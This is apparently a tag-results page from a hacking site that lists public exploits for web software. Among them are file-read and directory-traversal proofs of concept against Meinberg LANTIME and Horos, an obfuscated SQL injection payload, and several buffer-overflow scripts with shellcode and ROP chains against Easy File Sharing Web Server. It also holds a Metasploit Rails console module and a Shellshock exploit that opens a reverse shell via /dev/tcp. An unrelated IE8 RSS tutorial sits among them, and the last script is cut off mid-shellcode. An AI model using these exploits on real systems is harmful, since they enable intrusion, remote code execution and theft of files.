Showing results for the tag 'web'.



40 results found

  1. Title: Meinberg LANTIME Web Configuration Utility - Arbitrary File Read
     Author: Jakub Palaczynski
     CVE: CVE-2017-16787

     Exploit tested on:
     ==================
     Meinberg LANTIME Web Configuration Utility 6.16.008

     Vulnerability affects:
     ======================
     All LTOS6 firmware releases before 6.24.004

     Vulnerability:
     **************

     Arbitrary File Read:
     ====================
     It is possible to read an arbitrary file on the system with root permissions.

     Proof of Concept:

     First instance:
     https://host/cgi-bin/mainv2?value=800&showntpclientipinfo=xxx&ntpclientcounterlogfile=/etc/passwd&lcs=xxx
     An Info-User is able to read any file on the system with root permissions.

     Second instance:
     A user with Admin-User access is able to read any file on the system via the firmware update functionality. Curl accepts the "file" scheme, which actually downloads the file from the local filesystem. It is then possible to download the /upload/update file, which contains the content of the requested file.

     Contact:
     ========
     Jakub[dot]Palaczynski[at]gmail[dot]com
  2. Hacking

    # Exploit Title: Easy Web Search 4.0 - SQL Injection
    # Dork: N/A
    # Date: 28.08.2017
    # Vendor Homepage: http://nelliwinne.net/
    # Software Link: https://codecanyon.net/item/easy-web-search-php-search-engine-with-image-search-and-crawling-system/17574164
    # Demo: http://codecanyon.nelliwinne.net/EasyWebSearch/
    # Version: 4.0
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    #
    # Description:
    # The vulnerability allows an attacker to inject SQL commands.
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/admin/admin-delete.php?id=[SQL]
    # http://localhost/[PATH]/admin/admin-spidermode.php?id=[SQL]
    #
    # 755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/+bY+x)a)+aND+''='
    #
    # Etc..
  3. Trick-windows

    You can get access to information such as sports news, weather and so on. IE8 provides two features called RSS Feed and Web Slices, through which you can receive up-to-date news and information. Note that not every site offers RSS. Now go to the Microsoft site: you will see that the RSS Feed icon in the toolbar has become active, which shows that this site contains RSS. Clicking this icon lets you see the RSS feeds available on the site, and clicking the small triangle next to it lets you reach the available feed. Clicking that entry opens a page that presents the up-to-date information to you. If you want to keep access to this information, click Subscribe to this feed so that the corresponding dialog appears. In the Name field you can give the feed any name you like; in the Create in field you can choose where it is created, which by default is the Feeds folder, and clicking New folder lets you create a new folder for it. Enabling the next option adds the feed directly to the Favorites bar. Finally, click Subscribe. From then on, whichever site you are on, you can click the feed you want and access its information.

    Next you will get to know another feature called Web Slices. To begin, go to espn.com. As you can see, the RSS icon does not appear on this site; instead a new icon called Web Slices is shown. Clicking this icon opens a window, and clicking Add to Favorites bar adds the Web Slice to the Favorites bar. This way you can access these Web Slices from any other site you happen to be on.

    Now choose Internet Options from the Tools menu. Open the Content tab and look at the last section of the window, which relates to RSS Feeds and Web Slices. Clicking Settings gives you access to the settings for these features. Enabling the first option lets you set how often this information is refreshed, every few days or every few hours. Enabling the next option marks each feed in red as read after you have read it. Enabling the Play a sound... option plays a sound whenever an RSS Feed or Web Slice is present on a page, notifying you of it. Enabling the next option plays a sound whenever an RSS feed is updated.
  5. #!/usr/bin/env python
     # Easy File Sharing Web Server v7.2 Remote SEH Based Overflow
     # The buffer overwrites ebx with 750+ offset, when sending 4059 it overwrites the EBX
     # vulnerable file /changeuser.ghp > Cookies UserID=[buf]
     # Means there are two ways to exploit changeuser.ghp
     # Tested on Win7 x64 and x86, it should work on win8/win10
     # By Audit0r
     # https://twitter.com/Audit0rSA

     import sys, socket, struct

     if len(sys.argv) < 3:
         print "Usage: python efsws.py [host] [port]"
         exit()

     host = sys.argv[1]
     port = int(sys.argv[2])

     # https://code.google.com/p/win-exec-calc-shellcode/
     shellcode = (
         "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9" +
         "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56" +
         "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9" +
         "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97" +
         "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64" +
         "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8" +
         "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a" +
         "\x1c\x39\xbd"
     )

     print "[+]Connecting to" + host

     craftedreq = "A"*4059
     craftedreq += "\xeb\x06\x90\x90"             # basic SEH jump
     craftedreq += struct.pack("<I", 0x10017743)  # pop commands from ImageLoad.dll
     craftedreq += "\x90"*40                      # NOPer
     craftedreq += shellcode
     craftedreq += "C"*50                         # filler

     httpreq = (
         "GET /changeuser.ghp HTTP/1.1\r\n"
         "User-Agent: Mozilla/4.0\r\n"
         "Host:" + host + ":" + str(port) + "\r\n"
         "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
         "Accept-Language: en-us\r\n"
         "Accept-Encoding: gzip, deflate\r\n"
         "Referer: http://" + host + "/\r\n"
         "Cookie: SESSIONID=6771; UserID=" + craftedreq + "; PassWD=;\r\n"
         "Conection: Keep-Alive\r\n\r\n"
     )

     print "[+]Sending the Calc...."
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((host, port))
     s.send(httpreq)
     s.close()
  6. #!/usr/bin/env python
     #
     # Exploit title: Easy File Sharing Web Server v7.2 - Remote SEH Buffer Overflow (DEP bypass with ROP)
     # Date: 29/11/2015
     # Exploit Author: Knaps
     # Contact: @TheKnapsy
     # Website: http://blog.knapsy.com
     # Software Link: http://www.sharing-file.com/efssetup.exe
     # Version: Easy File Sharing Web Server v7.2
     # Tested on: Windows 7 x64, but should work on any other Windows platform
     #
     # Notes:
     # - based on non-DEP SEH buffer overflow exploit by Audit0r (https://www.exploit-db.com/exploits/38526/)
     # - created for fun & practice, also because it's not 1998 anymore - gotta bypass that DEP! :)
     # - bad chars: '\x00' and '\x3b'
     # - max shellcode size allowed: 1260 bytes
     #

     import sys, socket, struct

     # ROP chain generated with mona.py - www.corelan.be (and slightly fixed by @TheKnapsy)
     # Essentially, use PUSHAD to set all parameters and call VirtualProtect() to disable DEP.
     def create_rop_chain():
         rop_gadgets = [
             # Generate value of 201 in EAX
             0x10015442,  # POP EAX # RETN [ImageLoad.dll]
             0xFFFFFDFF,  # Value of '-201'
             0x100231d1,  # NEG EAX # RETN [ImageLoad.dll]
             # Put EAX into EBX (other unnecessary stuff comes with this gadget as well...)
             0x1001da09,  # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+C] # INC DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
             # Carry on with the ROP as generated by mona.py
             0x10015442,  # POP EAX # RETN [ImageLoad.dll]
             0x61c832d0,  # ptr to &VirtualProtect() [IAT sqlite3.dll]
             # Compensate for the ADD EBX,EAX gadget above, jump over 1 address, which is a dummy writeable location
             # used solely by the remaining part of the above gadget (it doesn't really do anything for us)
             0x1001281a,  # ADD ESP,4 # RETN [ImageLoad.dll]
             0x61c73281,  # &Writable location [sqlite3.dll]
             # And carry on further as generated by mona.py
             0x1002248c,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
             0x61c18d81,  # XCHG EAX,EDI # RETN [sqlite3.dll]
             0x1001d626,  # XOR ESI,ESI # RETN [ImageLoad.dll]
             0x10021a3e,  # ADD ESI,EDI # RETN 0x00 [ImageLoad.dll]
             0x10013ad6,  # POP EBP # RETN [ImageLoad.dll]
             0x61c227fa,  # & push esp # ret [sqlite3.dll]
             0x10022c4c,  # XOR EDX,EDX # RETN [ImageLoad.dll]
         ]
         # Now bunch of ugly increments... unfortunately couldn't find anything nicer :(
         # The original listing repeats this gadget 64 times so that EDX ends up as 0x40:
         # 0x61c066be, # INC EDX # ADD CL,CL # RETN [sqlite3.dll]
         rop_gadgets += [0x61c066be] * 64
         rop_gadgets += [
             0x1001b4f6,  # POP ECX # RETN [ImageLoad.dll]
             0x61c73281,  # &Writable location [sqlite3.dll]
             0x100194b3,  # POP EDI # RETN [ImageLoad.dll]
             0x1001a858,  # RETN (ROP NOP) [ImageLoad.dll]
             0x10015442,  # POP EAX # RETN [ImageLoad.dll]
             0x90909090,  # nop
             0x100240c2,  # PUSHAD # RETN [ImageLoad.dll]
         ]
         return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

     # Check command line args
     if len(sys.argv) < 3:
         print "Usage: python poc.py [host] [port]"
         exit()

     host = sys.argv[1]
     port = int(sys.argv[2])

     # Offsets
     rop_offset = 2455
     max_size = 5000
     seh_offset = 4059
     eax_offset = 4183

     # move ESP out of the way so the shellcode doesn't corrupt itself during execution
     # metasm > add esp,-1500
     shellcode = "\x81\xc4\x24\xfa\xff\xff"

     # Just as a PoC, spawn calc.exe. Replace with any other shellcode you want
     # (maximum size of shellcode allowed: 1260 bytes)
     #
     # msfvenom -p windows/exec CMD=calc.exe -b '\x00\x3b' -f python
     # Payload size: 220 bytes
     shellcode += "\xbb\xde\x37\x73\xe9\xdb\xdf\xd9\x74\x24\xf4\x58\x31"
     shellcode += "\xc9\xb1\x31\x31\x58\x13\x83\xe8\xfc\x03\x58\xd1\xd5"
     shellcode += "\x86\x15\x05\x9b\x69\xe6\xd5\xfc\xe0\x03\xe4\x3c\x96"
     shellcode += "\x40\x56\x8d\xdc\x05\x5a\x66\xb0\xbd\xe9\x0a\x1d\xb1"
     shellcode += "\x5a\xa0\x7b\xfc\x5b\x99\xb8\x9f\xdf\xe0\xec\x7f\xde"
     shellcode += "\x2a\xe1\x7e\x27\x56\x08\xd2\xf0\x1c\xbf\xc3\x75\x68"
     shellcode += "\x7c\x6f\xc5\x7c\x04\x8c\x9d\x7f\x25\x03\x96\xd9\xe5"
     shellcode += "\xa5\x7b\x52\xac\xbd\x98\x5f\x66\x35\x6a\x2b\x79\x9f"
     shellcode += "\xa3\xd4\xd6\xde\x0c\x27\x26\x26\xaa\xd8\x5d\x5e\xc9"
     shellcode += "\x65\x66\xa5\xb0\xb1\xe3\x3e\x12\x31\x53\x9b\xa3\x96"
     shellcode += "\x02\x68\xaf\x53\x40\x36\xb3\x62\x85\x4c\xcf\xef\x28"
     shellcode += "\x83\x46\xab\x0e\x07\x03\x6f\x2e\x1e\xe9\xde\x4f\x40"
     shellcode += "\x52\xbe\xf5\x0a\x7e\xab\x87\x50\x14\x2a\x15\xef\x5a"
     shellcode += "\x2c\x25\xf0\xca\x45\x14\x7b\x85\x12\xa9\xae\xe2\xed"
     shellcode += "\xe3\xf3\x42\x66\xaa\x61\xd7\xeb\x4d\x5c\x1b\x12\xce"
     shellcode += "\x55\xe3\xe1\xce\x1f\xe6\xae\x48\xf3\x9a\xbf\x3c\xf3"
     shellcode += "\x09\xbf\x14\x90\xcc\x53\xf4\x79\x6b\xd4\x9f\x85"

     buffer = "A" * rop_offset                    # padding
     buffer += create_rop_chain()
     buffer += shellcode
     buffer += "A" * (seh_offset - len(buffer))   # padding
     buffer += "BBBB"                             # overwrite nSEH pointer
     buffer += struct.pack("<I", 0x1002280a)      # overwrite SEH record with stack pivot (ADD ESP,1004 # RETN [ImageLoad.dll])
     buffer += "A" * (eax_offset - len(buffer))   # padding
     buffer += struct.pack("<I", 0xffffffff)      # overwrite EAX to always trigger an exception
     buffer += "A" * (max_size - len(buffer))     # padding

     httpreq = (
         "GET /changeuser.ghp HTTP/1.1\r\n"
         "User-Agent: Mozilla/4.0\r\n"
         "Host:" + host + ":" + str(port) + "\r\n"
         "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
         "Accept-Language: en-us\r\n"
         "Accept-Encoding: gzip, deflate\r\n"
         "Referer: http://" + host + "/\r\n"
         "Cookie: SESSIONID=6771; UserID=" + buffer + "; PassWD=;\r\n"
         "Conection: Keep-Alive\r\n\r\n"
     )

     # Send payload to the server
     s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
     s.connect((host, port))
     s.send(httpreq)
     s.close()
  7. # Exploit Title: Easy File Sharing Web Server 7.2 - HEAD HTTP request SEH Buffer Overflow
     # Date: 12/2/2015
     # Exploit Author: ArminCyber
     # Contact: [email protected]
     # Version: 7.2
     # Tested on: XP SP3 EN
     # category: Remote Exploit
     # Usage: ./exploit.py ip port

     import socket
     import sys

     host = str(sys.argv[1])
     port = int(sys.argv[2])

     a = socket.socket()
     print "Connecting to: " + host + ":" + str(port)
     a.connect((host,port))

     entire=4500

     # Junk
     buff = "A"*4061
     # Next SEH
     buff+= "\xeb\x0A\x90\x90"
     # pop pop ret
     buff+= "\x98\x97\x01\x10"
     buff+= "\x90"*19

     # calc.exe
     # Bad Characters: \x20 \x2f \x5c
     shellcode = (
         "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
         "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
         "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
         "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
         "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
         "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
         "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
         "\x1c\x39\xbd"
     )

     buff+= shellcode
     buff+= "\x90"*7
     buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)

     # HEAD
     a.send("HEAD " + buff + " HTTP/1.0\r\n\r\n")
     a.close()
     print "Done..."
  8. # Exploit Title: Easy File Sharing Web Server 7.2 - GET HTTP request SEH Buffer Overflow
     # Date: 12/2/2015
     # Exploit Author: ArminCyber
     # Contact: [email protected]
     # Version: 7.2
     # Tested on: XP SP3 EN
     # category: Remote Exploit
     # Usage: ./exploit.py ip port

     import socket
     import sys

     host = str(sys.argv[1])
     port = int(sys.argv[2])

     a = socket.socket()
     print "Connecting to: " + host + ":" + str(port)
     a.connect((host,port))

     entire=4500

     # Junk
     buff = "A"*4061
     # Next SEH
     buff+= "\xeb\x0A\x90\x90"
     # pop pop ret
     buff+= "\x98\x97\x01\x10"
     buff+= "\x90"*19

     # calc.exe
     # Bad Characters: \x20 \x2f \x5c
     shellcode = (
         "\xd9\xcb\xbe\xb9\x23\x67\x31\xd9\x74\x24\xf4\x5a\x29\xc9"
         "\xb1\x13\x31\x72\x19\x83\xc2\x04\x03\x72\x15\x5b\xd6\x56"
         "\xe3\xc9\x71\xfa\x62\x81\xe2\x75\x82\x0b\xb3\xe1\xc0\xd9"
         "\x0b\x61\xa0\x11\xe7\x03\x41\x84\x7c\xdb\xd2\xa8\x9a\x97"
         "\xba\x68\x10\xfb\x5b\xe8\xad\x70\x7b\x28\xb3\x86\x08\x64"
         "\xac\x52\x0e\x8d\xdd\x2d\x3c\x3c\xa0\xfc\xbc\x82\x23\xa8"
         "\xd7\x94\x6e\x23\xd9\xe3\x05\xd4\x05\xf2\x1b\xe9\x09\x5a"
         "\x1c\x39\xbd"
     )

     buff+= shellcode
     buff+= "\x90"*7
     buff+= "A"*(4500-4061-4-4-20-len(shellcode)-20)

     # GET
     a.send("GET " + buff + " HTTP/1.0\r\n\r\n")
     a.close()
     print "Done..."
  9. ##
     # This module requires Metasploit: http://metasploit.com/download
     # Current source: https://github.com/rapid7/metasploit-framework
     ##

     require 'msf/core'

     class MetasploitModule < Msf::Exploit::Remote
       Rank = ExcellentRanking

       include Msf::Exploit::Remote::HttpClient

       def initialize(info = {})
         super(update_info(info,
           'Name'           => 'Ruby on Rails Development Web Console (v2) Code Execution',
           'Description'    => %q{
             This module exploits a remote code execution feature of the Ruby on Rails
             framework. This feature is exposed if the config.web_console.whitelisted_ips
             setting includes untrusted IP ranges and the web-console gem is enabled.
           },
           'Author'         => ['hdm'],
           'License'        => MSF_LICENSE,
           'References'     => [
             [ 'URL', 'https://github.com/rails/web-console' ]
           ],
           'Platform'       => 'ruby',
           'Arch'           => ARCH_RUBY,
           'Privileged'     => false,
           'Targets'        => [ ['Automatic', {} ] ],
           'DefaultOptions' => { 'PrependFork' => true },
           'DisclosureDate' => 'May 2 2016',
           'DefaultTarget'  => 0))

         register_options(
           [
             Opt::RPORT(3000),
             OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
           ], self.class)
       end

       #
       # Identify the web console path and session ID, then inject code with it
       #
       def exploit
         res = send_request_cgi({
           'uri'    => normalize_uri(target_uri.path),
           'method' => 'GET'
         }, 25)

         unless res
           print_error("Error: No response requesting #{datastore['TARGETURI']}")
           return
         end

         unless res.body.to_s =~ /data-mount-point='([^']+)'/
           if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
             print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
           else
             print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
           end
           return
         end

         console_path = normalize_uri($1, 'repl_sessions')

         unless res.body.to_s =~ /data-session-id='([^']+)'/
           print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
           return
         end

         session_id = $1

         print_status("Sending payload to #{console_path}/#{session_id}")

         res = send_request_cgi({
           'uri'     => normalize_uri(console_path, session_id),
           'method'  => 'PUT',
           'headers' => {
             'Accept'           => 'application/vnd.web-console.v2',
             'X-Requested-With' => 'XMLHttpRequest'
           },
           'vars_post' => {
             'input' => payload.encoded
           }
         }, 25)
       end
     end
  10. #!/usr/bin/env python
      # TrendMicro InterScan Web Security Virtual Appliance
      # ==================================================
      # InterScan Web Security is a software virtual appliance that
      # dynamically protects against the ever-growing flood of web
      # threats at the Internet gateway exclusively designed to secure
      # you against traditional and emerging web threats at the Internet
      # gateway. The appliance however is shipped with a vulnerable
      # version of Bash susceptible to shellshock (I know right?). An
      # attacker can exploit this vulnerability by calling the CGI
      # shellscript "/cgi-bin/cgiCmdNotify" which can be exploited
      # to perform arbitrary code execution. A limitation of this
      # vulnerability is that the attacker must have credentials for
      # the admin web interface to exploit this flaw. The panel runs
      # over HTTP by default so a man-in-the-middle attack could be
      # used to gain credentials and compromise the appliance.
      #
      # $ python trendmicro_IWSVA_shellshock.py 192.168.56.101 admin password 192.168.56.1
      # [+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit
      # [-] Authenticating to '192.168.56.101' with 'admin' 'password'
      # [-] JSESSIONID = DDE38E62757ADC00A51311F1F953EEBA
      # [-] exploiting shellshock CVE-2014-6271...
      # bash: no job control in this shell
      # bash-4.1$ id
      # uid=498(iscan) gid=499(iscan) groups=499(iscan)
      #
      # -- Hacker Fantastic
      #
      # (https://www.myhackerhouse.com)

      import requests
      import sys
      import os

      def spawn_listener():
          os.system("nc -l 8080")

      def shellshock(ip,session,cbip):
          user_agent = {'User-agent': '() { :; }; /bin/bash -i >& /dev/tcp/'+cbip+'/8080 0>&1'}
          cookies = {'JSESSIONID': session}
          print "[-] exploiting shellshock CVE-2014-6271..."
          myreq = requests.get("http://"+ip+":1812/cgi-bin/cgiCmdNotify", headers = user_agent, cookies = cookies)

      def login_http(ip,user,password):
          mydata = {'wherefrom':'','wronglogon':'no','uid':user, 'passwd':password,'pwd':'Log+On'}
          print "[-] Authenticating to '%s' with '%s' '%s'" % (ip,user,password)
          myreq = requests.post("http://"+ip+":1812/uilogonsubmit.jsp", data=mydata)
          session_cookie = myreq.history[0].cookies.get('JSESSIONID')
          print "[-] JSESSIONID = %s" % session_cookie
          return session_cookie

      if __name__ == "__main__":
          print "[+] TrendMicro InterScan Web Security Virtual Appliance CVE-2014-6271 exploit"
          if len(sys.argv) < 5:
              print "[-] use with <ip> <user> <pass> <connectback_ip>"
              sys.exit()
          newRef=os.fork()
          if newRef==0:
              spawn_listener()
          else:
              session = login_http(sys.argv[1],sys.argv[2],sys.argv[3])
              shellshock(sys.argv[1],session,sys.argv[4])
  11. Hacking

    Horos 2.1.0 Web Portal Remote Information Disclosure Exploit

    Vendor: Horos Project
    Product web page: https://www.horosproject.org
    Affected version: 2.1.0

    Summary: Horos™ is an open-source, free medical image viewer. The goal of the Horos Project is to develop a fully functional, 64-bit medical image viewer for OS X. Horos is based upon OsiriX and other open source medical imaging libraries.

    Desc: Horos suffers from a file disclosure vulnerability when input passed through the URL path is not properly verified before being used to read files. This can be exploited to include files from local resources with directory traversal attacks.

    Tested on: macOS Sierra/10.12.2
               macOS Sierra/10.12.1

    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience

    Advisory ID: ZSL-2016-5387
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5387.php

    15.12.2016

    --

    PoC request:
    http://127.0.0.1:3333/.../...//.../...//.../...//.../...//.../...//etc/passwd

    Response:
    ##
    # User Database
    #
    # Note that this file is consulted directly only when the system is running
    # in single-user mode. At other times this information is provided by
    # Open Directory.
    #
    # See the opendirectoryd(8) man page for additional information about
    # Open Directory.
    ##
    nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
    root:*:0:0:System Administrator:/var/root:/bin/sh
    daemon:*:1:1:System Services:/var/root:/usr/bin/false
    _uucp:*:4:4:Unix to Unix Copy Protocol:/var/spool/uucp:/usr/sbin/uucico
    _taskgated:*:13:13:Task Gate Daemon:/var/empty:/usr/bin/false
    _networkd:*:24:24:Network Services:/var/networkd:/usr/bin/false
    ...
    ...
    ...
  12. Hacking

    # Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
    # Date: 26/05/2017
    # Exploit Author: Guillaume Kaddouch
    # Twitter: @gkweb76
    # Blog: https://networkfilter.blogspot.com
    # GitHub: https://github.com/gkweb76/exploits
    # Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
    # Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
    # Version: 1.9.1 (build 164)
    # Tested on: Windows 7 SP1 Family x64 (FR)
    # Category: Webapps

    """
    Disclosure Timeline:
    --------------------
    2017-05-26: Vulnerability discovered
    2017-05-26: Vendor website is down, no way to contact him

    Description :
    -------------
    Home Web Server allows calling CGI programs via POST which are located in the /cgi-bin folder.
    However, by using a directory traversal, it is possible to run any executable present on the remote host.

    Instructions:
    -------------
    - Start Home Web Server.
    - Run this exploit from a remote Kali machine with netcat as below.
    """

    # Connect with netcat, then drop a single POST to call the executable you want
    [email protected]:~/kiwi_syslog$ nc 10.0.0.100 80
    POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1

    # Returned response
    HTTP/1.1 400 Bad Request
    Connection: close
    Content-Length: 0
    Server: My Web Server (HWS164)

    """
    [CTRL+C] : this is important to launch the executable we requested
    Calc.exe has been launched on the remote host.
    """
  13. Hacking

    # Exploit Title: EFS Web Server 7.2 Authentication Bypass
    # Date: 11-06-2017
    # Software Link: http://www.sharing-file.com/efssetup.exe
    # Software Version : 7.2
    # Exploit Author: Touhid M.Shaikh
    # Contact: http://twitter.com/touhidshaikh22
    # Website: http://touhidshaikh.com/

    ######## Description ########
    <!--
    What is Easy File Sharing Web Server 7.2 ?
    Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.
    -->

    ######## Video PoC and Article ########
    https://www.youtube.com/watch?v=XlTH7Fm1m1w
    http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/

    ######## Attack Description ########
    <!--
    Note: No need to login... because this is an auth bypass vulnerability. hehehe.
    ==>START<==
    Any visitor... We can bypass the login screen by just changing the URL and browsing the drives. bingoo...
    -->

    ######## Proof of Concept ########
    When we visit the EFS web server it prompts for login; now the attacker just changes the URL to the one below.

    Exploit....
    http://192.168.1.14/disk_c/

    In this case, change the drive by just changing /disk_c to /disk_<drive letter>, for example /disk_d, /disk_f etc.

    =============================================
    NOTE :: :: Now we have permission to view drives and folders and download files in different drives or folders.
    =============================================
  14. Hacking

    #!/usr/bin/python
    # Title : EFS Web Server 7.2 POST HTTP Request Buffer Overflow
    # Author : Touhid M.Shaikh
    # Date : 12 June, 2017
    # Contact: [email protected]
    # Version: 7.2
    # category: Remote Exploit
    # Tested on: Windows XP SP3 EN [Version 5.1.2600]

    """
    ######## Description ########
    What is Easy File Sharing Web Server 7.2 ?
    Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a Web Browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.

    ######## Video PoC and Article ########
    https://www.youtube.com/watch?v=Mdmd-7M8j-M
    http://touhidshaikh.com/blog/poc/EFSwebservr-postbufover/
    """

    import httplib

    total = 4096

    # Shellcode: open cmd.exe
    shellcode = (
        "\x8b\xec\x55\x8b\xec"
        "\x68\x65\x78\x65\x2F"
        "\x68\x63\x6d\x64\x2e"
        "\x8d\x45\xf8\x50\xb8"
        "\xc7\x93\xc2\x77"
        "\xff\xd0")

    our_code = "\x90"*100                          # NOP sled
    our_code += shellcode
    our_code += "\x90"*(4072-100-len(shellcode))
    # point RET to the NOP sled
    our_code += "\x3c\x62\x83\x01"                  # overwrite RET
    our_code += "\x90"*12                           # NOP sled
    our_code += "A"*(total-(4072+16))               # ESP pointing

    # Server address and port
    httpServ = httplib.HTTPConnection("192.168.1.6", 80)
    httpServ.connect()
    httpServ.request('POST', '/sendemail.ghp', 'Email=%s&getPassword=Get+Password' % our_code)
    response = httpServ.getresponse()
    httpServ.close()

    """
    NOTE : After exiting cmd.exe our server will crash because of ESP.
    Adjust ESP by yourself ... hehhehhe...
    """
  15. #!/usr/bin/python
      # Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP)
      # Exploit Author: bl4ck h4ck3r
      # Software Link: http://www.sharing-file.com/efssetup.exe
      # Version: Easy File Sharing Web Server v7.2
      # Tested on: Windows XP SP2, Windows 2008 R2 x64

      import socket
      import struct
      import sys

      if len(sys.argv) < 2:
          print "\nUsage: " + sys.argv[0] + " <host>\n"
          exit()

      # 0x1002280a : # ADD ESP,1004 # RETN ** [ImageLoad.dll] ** | ascii {PAGE_EXECUTE_READ}
      ret = struct.pack("<I", 0x1002280a)

      # nopsled
      shellcode = "\x90"*200

      # msfvenom -p windows/exec cmd=calc.exe -e x86/alpha_mixed -v shellcode -f python
      shellcode += "\x89\xe7\xd9\xec\xd9\x77\xf4\x5d\x55\x59\x49\x49"
      shellcode += "\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43"
      shellcode += "\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30"
      shellcode += "\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30"
      shellcode += "\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
      shellcode += "\x39\x6c\x5a\x48\x6b\x32\x55\x50\x67\x70\x47\x70"
      shellcode += "\x75\x30\x6e\x69\x78\x65\x65\x61\x39\x50\x31\x74"
      shellcode += "\x4c\x4b\x50\x50\x46\x50\x4c\x4b\x36\x32\x36\x6c"
      shellcode += "\x6c\x4b\x66\x32\x42\x34\x6c\x4b\x52\x52\x77\x58"
      shellcode += "\x54\x4f\x4c\x77\x63\x7a\x31\x36\x66\x51\x4b\x4f"
      shellcode += "\x4e\x4c\x47\x4c\x73\x51\x73\x4c\x76\x62\x76\x4c"
      shellcode += "\x51\x30\x59\x51\x78\x4f\x46\x6d\x76\x61\x48\x47"
      shellcode += "\x6a\x42\x79\x62\x50\x52\x50\x57\x4c\x4b\x63\x62"
      shellcode += "\x36\x70\x4e\x6b\x30\x4a\x37\x4c\x6e\x6b\x42\x6c"
      shellcode += "\x42\x31\x33\x48\x49\x73\x50\x48\x33\x31\x6a\x71"
      shellcode += "\x42\x71\x4c\x4b\x63\x69\x47\x50\x45\x51\x4a\x73"
      shellcode += "\x6c\x4b\x72\x69\x44\x58\x6b\x53\x67\x4a\x42\x69"
      shellcode += "\x6e\x6b\x45\x64\x4c\x4b\x46\x61\x6b\x66\x35\x61"
      shellcode += "\x39\x6f\x6c\x6c\x6b\x71\x58\x4f\x34\x4d\x46\x61"
      shellcode += "\x6b\x77\x44\x78\x6d\x30\x71\x65\x59\x66\x64\x43"
      shellcode += "\x61\x6d\x48\x78\x67\x4b\x61\x6d\x74\x64\x32\x55"
      shellcode += "\x4d\x34\x42\x78\x6e\x6b\x32\x78\x44\x64\x56\x61"
      shellcode += "\x68\x53\x62\x46\x4e\x6b\x36\x6c\x70\x4b\x4c\x4b"
      shellcode += "\x56\x38\x35\x4c\x56\x61\x59\x43\x6c\x4b\x76\x64"
